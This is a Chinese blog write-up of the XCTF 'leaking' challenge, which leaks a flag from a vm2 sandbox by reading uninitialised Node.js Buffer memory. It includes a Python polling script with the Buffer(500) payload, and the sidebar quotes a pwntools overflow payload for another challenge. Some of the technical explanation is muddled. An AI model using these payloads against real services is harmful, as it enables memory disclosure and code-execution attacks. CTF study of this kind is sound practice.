攻防世界——leaking

最新推荐文章于 2024-01-02 00:00:00 发布
最新推荐文章于 2024-01-02 00:00:00 发布
阅读量291 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: javascript 前端 node.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/125439976
版权

进入环境,给了一段代码

浅谈npm,vm,vm2,Node.js沙盒逃逸

这是一题是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)

在较早一点的 node 版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的
8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存

低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存
req.query.data.length 的限制可以通过传入数组绕过

1.题目通过访问得到了一串代码,这段代码提示在沙箱中执行。

2.由于沙箱的隔离机制,无法执行eval()等操作系统的函数。

3.要拿到flag则需要让eval()执行。利用逃逸沙箱漏洞,从而得到flag。

看了别人的解题思路,通过脚本,找到内存泄漏时执行的eval()函数,得到flag。

import requests
import time
url = 'http://ip:port/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

 

 

 

隐身的菜鸟
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gradient Inversion Attack Leaking Private Labels in Two-Party Sp
01-03
Gradient Inversion Attack Leaking Private Labels in Two-Party Split Learning_两方分裂学习中泄漏私有标签的梯度反转攻击.pdf
浅谈NPM,vm,vm2,Node.js沙盒逃逸
m0_62063669的博客
06-24 3044
浅谈NPM,vm,vm2,Node.js沙盒逃逸( npm是用 JavaScript 写的,运行在 Node.js 上,Node.js 内置了 npm,npm 的发展是跟 Node.js 的发展相辅相成的。)简单来说, Node.js 就是运行在服务端的JavaScript,npm是随同Node.js一起安装的包管理工具,通过命令从npm服务器下载别人编写的第三方工具到本地使用。但是VM不安全,能轻易地获取到了主程序的全局对象 process,最终控制主程序!因此VM2诞生,解决了VM的安全问题。 ..
NPM酷库:vm2,安全的沙箱环境
weixin_34293059的博客
01-02 1168
NPM酷库,每天两分钟,了解一个流行NPM库。 今天我们要了解的库是 vm2,则是一个Node.js 官方 vm 库的替代品,主要解决了安全问题。 不安全的vm 在Node.js官方标准库中有一个vm库,用来在V8虚拟机环境中编译执行JS代码。通常,我们用vm库来实现一个沙箱,在代码主程序之外执行额外的JS脚本。 有时,我们需要vm虚拟机...
漏洞实现 --- Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
weixin_62443409的博客
09-13 4951
安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)CentOS7(Nodejs和vm@3.9.17)升级nodejs至高版本。
node之vm2库,js沙盒环境
最新发布
局外人LZ的博客
01-02 2649
vm2 是一个用于在 Node.js 中创建沙盒环境的模块。它提供了一种安全执行 JavaScript 代码的方式,可以隔离和限制代码的访问权限,防止恶意代码对系统造成损害。创建沙盒环境:vm2 允许你创建一个虚拟机实例(VM),在该实例中运行 JavaScript 代码。这个虚拟机实例是一个隔离的环境,与主 Node.js 进程相互独立,可以在其中执行代码。限制访问权限:vm2 允许你限制代码对系统资源的访问权限。你可以控制代码能否访问全局对象、模块、文件系统和网络等资源,从而提供更高的安全性。
漏洞预警| vm2 任意代码执行漏洞
LJQClqjc的博客
12-22 849
棱镜七彩漏洞预警
private-leaking-investigation:用于演示 AngularJS 内存泄漏的示例应用程序
06-18
本篇文章将深入探讨AngularJS中的内存泄漏现象,通过分析一个名为"private-leaking-investigation"的示例应用程序来揭示其原因,并提供相应的解决策略。 首先,我们需要理解什么是内存泄漏。在计算机科学中,内存...
Cisco-Fusion-Router-IOS-XE-route-leaking-guide from yuanshou
06-17
【Cisco Fusion Router IOS XE 路由泄露指南】 在Cisco Fusion Router的环境中,路由泄露是一种重要的网络配置技术,主要用于连接不同的虚拟网络(VN),确保它们之间的通信,并允许终端设备访问共享服务,如DHCP和...
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure.pdf
08-21
在当今数字化的世界中,信息安全和数据保护成为了至关重要的议题。金融安全、数字风险以及安全建设是企业和个人都必须关注的领域。在《信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure》这份报告...
V2EX克隆项目升级Vuejs1xto20
08-09
Vue.js 是一款非常流行的前端JavaScript框架,用于构建用户界面。Vue.js 1.x 和 2.0 是其两个主要版本,两者之间存在一些显著的区别。本文将深入探讨V2EX克隆项目从Vue.js 1.x升级到2.0的过程,以及这个过程中涉及的...
攻防世界-leaking-(详细操作)做题过程
qq_43715020的博客
06-18 267
攻防世界-leaking-(详细操作)做题过程
xctf攻防世界Leaking wp
sash1mi
01-15 1689
访问题目地址 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { .
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1655
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界xctfweb题leaking题解
qq_60787987的博客
03-13 5882
11打开网站我们可以看到如下代码: 正在上传… 重新上传 取消
攻防世界 WEB leaking
qq_41696858的博客
08-25 372
这题考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了 具体看这一篇,https://juejin.cn/post/6889226643525599240 简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求, 使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一题来举个例吧 先看一下代码 "use strict"; var randomstring = require("
攻防世界 web leaking
Zeker62的博客
09-08 209
https://blog.csdn.net/weixin_46676743/article/details/112669105
攻防世界 web高级 leaking
beihai2013
01-18 684
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
攻防世界 web高手进阶区 5分题 leaking
闵行小鱼塘
04-14 633
攻防世界web高手进阶区的5分题,本篇是leaking的writeup
攻防世界level0
qq_45213259的博客
07-24 1335
from pwn import * p = remote("111.198.29.45","32092") call_system = 0x400596 print p64(call_system) payload = 0x88*'a' + p64(call_system) p.sendline(payload) p.interactive()
Leaking Caffe2 thread-pool after fork.
05-23
这个错误通常是由于在主进程中创建了Caffe2线程池,但在子进程中没有正确地清理它所引起的。这可能会导致子进程中的线程池泄漏,从而导致性能下降或其他问题。 要解决此问题,您可以在fork之后立即清理Caffe2线程池...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值